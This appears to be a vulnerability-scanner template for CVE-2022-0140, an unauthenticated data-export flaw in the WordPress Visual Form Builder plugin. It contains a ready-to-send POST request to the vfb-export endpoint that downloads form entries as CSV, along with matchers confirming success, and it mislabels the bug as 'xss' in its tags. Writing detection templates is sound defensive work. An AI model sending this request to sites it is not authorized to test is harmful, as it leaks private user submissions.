34 lines
1.1 KiB
YAML
34 lines
1.1 KiB
YAML
|
id: CVE-2022-0140
|
||
|
|
||
|
info:
|
||
|
name: WordPress Visual Form Builder < 3.0.6 - Unauthenticated Information Disclosure
|
||
|
author: random-robbie
|
||
|
severity: low
|
||
|
description: |
|
||
|
Visual Form Builder < 3.0.6 - Unauthenticated Information Disclosure. The plugin does not perform access control on entry form export, allowing unauthenticated users to see the form entries or export it as a CSV File using the vfb-export endpoint.
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/9fa2b3b6-2fe3-40f0-8f71-371dd58fe336
|
||
|
tags: cve,cve2022,xss,wordpress
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /wp-admin/admin.php?page=vfb-export HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Referer: {{RootURL}}/wp-admin/admin.php?page=vfb-export
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
Origin: {{RootURL}}
|
||
|
|
||
|
vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- '"Date Submitted"'
|
||
|
- '"Entries ID"'
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|